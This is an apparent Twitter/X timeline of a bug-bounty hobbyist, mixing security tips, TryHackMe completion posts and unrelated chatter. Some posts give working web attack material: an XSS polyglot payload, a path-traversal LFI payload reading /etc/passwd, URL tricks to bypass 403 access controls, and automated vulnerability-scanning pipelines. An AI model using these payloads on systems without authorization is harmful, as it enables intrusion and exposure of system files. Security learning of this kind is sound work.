#help post I want to learn #JavaScript for hacking purpose. Will you suggest me some resource for this purpose?
Posting this so I don't forget a great XSS polyglot javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> Anyone got anymore interesting polyglots?
Bug Testing Methodology Series: 𝐗𝐒𝐒 (𝐂𝐫𝐨𝐬𝐬 𝐒𝐢𝐭𝐞 𝐒𝐜𝐫𝐢𝐩𝐭𝐢𝐧𝐠) Learn how to test for #XSS step by step on real #bugbounty programs. Thread🧵👇 #cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity
Authentication Bypass - I have just completed this room! Check it out: tryhackme.com/room/authentic… #tryhackme #security #authenticationbypass via @realtryhackme
Careers in Cyber - I have just completed this room! Check it out: tryhackme.com/room/careersin… #tryhackme #security #career #job #security analyst #security engineer #incident responder #digital forensics examiner #malware analyst #penetration tester #red teamer #careersincyber
Intro to Defensive Security - I have just completed this room! Check it out: tryhackme.com/room/defensive… #tryhackme #security #defensive security #incident response #threat intelligence #malware analysis #DFIR #SOC #SIEM #Security Operations Center #defensivesecurity
Intro to Offensive Security - I have just completed this room! Check it out: tryhackme.com/room/introtoof… #tryhackme #offensive security #introtooffensivesecurity via @realtryhackme
#LFI #P1 #bugbountytips #bugbounty 1- Go to admin. site.tld/login 2- Tried to login with wrong credentials > error 3- Send to burp repeater 4- Found new parameter filename because of error 5- tried payload ../../../../../../../../../../../../etc/passwd 6- Full LFI ✅
Speak softly and humbly, Do not look down upon others, Be kind, gentle and non-judgemental Learn the adab (manners) of our Prophet (peace be upon him).
Nice one! Lets automate it 🔥🔥 cat targets.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc | nuclei -t severity high -silent | tee -a BugsFound.txt twitter.com/Fozisimi143/st… #bugbountytips #bugbountytip #bugbounty
Easy to find PUT method enabled mis configuration through @pdnuclei 1) Subdomain enumeration 2) http probing through httpx 3) save file into the hosts.txt file 4) run nuclei on hosts.txt file 5) nuclei -l hosts.txt -severty high 6) got a response put-method-enabled
I need a new chair - what do people recommend these days? I have a @secretlabchairs, but in two years its covering has frayed, and the arms have broken.. looking for other options
Bug Type: Reflected XSS Reward : 200$ 1) Pipe domain with waybackurls 2) Grep .php extension URLs and save in a file 3) Use arjun to find hidden parameters 4) Manually test each URL with XSS payloads #bugbountytip #bugbounty #cybersecurity #cybersecuritytips #Pentesting
Vroooo @ADITYASHENDE17 finally bypassed the Akamai WAF and exploited the Boolean based SQL😜😜.. Thanks for the tampering suggestion 😂🙊
403 Forbidden bypass 🔥🔥 GET /admin ==> 403 Forbidden GET /blablabal/%2e%2e/admin ==> 200 OK GET /blablabal/..;/admin ==> 200 OK GET /blablabal/;/admin ==> 200 OK GET /blablabal/admin/..;/ ==> 200 OK GET /admin?access=1 ==> 200 OK #bugbountytips #bugbountytip #bugbounty
Some cool endpoint bypasses simplified: #bugbountytips #infosec #appsec #pentest
Some blind xss techniques simplified: #bugbountytips #infosec #appsec #Pentesting
📂 Web 3.0 Smart Contracts Security ∟📂 Top Vulnerabilities ∟📂 Reentrancy ∟📂 Uninitialized Storage Pointer ∟📂 Assert Violation ∟📂 DoS with Failed Call ∟📂 Signature Malleability ∟📂 Integer Overflow and Underflow
See a host that's redirecting to Single-Sign on? Don't skip it. Do Content-Discovery. Use gau. Then ffuf. You will be surprised at the misconfigurations you'll find. And the things you can access (that you shouldn't be able to).
![[Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!](https://pbs.twimg.com/profile_images/1176789748322643968/bEReriMR.jpg)
United States Trends
- 1. $EMT 4.006 posts
- 2. Spotify 2,26 Mn posts
- 3. #EarthMeta 1.619 posts
- 4. Mbappe 155 B posts
- 5. Arsenal 397 B posts
- 6. Pete 893 B posts
- 7. CEOs 26,7 B posts
- 8. Brian Thompson 146 B posts
- 9. United Healthcare 81,8 B posts
- 10. Snape 2.489 posts
- 11. Newcastle 61,1 B posts
- 12. Ancelotti 36,2 B posts
- 13. Valverde 24,5 B posts
- 14. Citibike 9.918 posts
- 15. Kelleher 20,6 B posts
- 16. $TOAD 5.282 posts
- 17. Nunez 41,2 B posts
- 18. Chipotle 8.482 posts
- 19. $HAWK 3.909 posts
- 20. Subsonic 6.048 posts
Something went wrong.
Something went wrong.